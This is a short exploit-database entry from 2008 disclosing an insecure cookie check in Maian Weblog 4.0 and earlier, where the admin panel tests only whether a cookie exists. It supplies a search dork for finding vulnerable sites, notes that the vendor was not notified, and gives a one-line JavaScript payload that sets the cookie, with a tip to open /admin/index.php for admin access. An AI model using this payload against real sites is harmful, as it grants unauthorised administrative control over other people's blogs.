id: 3399
date: 07/12/2008
title: Maian Weblog <= 4.0 Insecure Cookie Handling Vulnerability
author: S.W.A.T.
cves: 

==========================================================
Maian Weblog <= 4.0 Insecure Cookie Handling Vulnerability
==========================================================


[*] Discovered By: S.W.A.T.
[*] DORK: Powered by Maian Weblog v4.0



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

   Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie

exists.
    and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

    javascript:document.cookie = "weblog_cookie=1; path=/";


[*] NOTE/TIP:

    after running the javascript, visit "/admin/index.php" to view admin area.



#  0day.today [2023-03-22]  #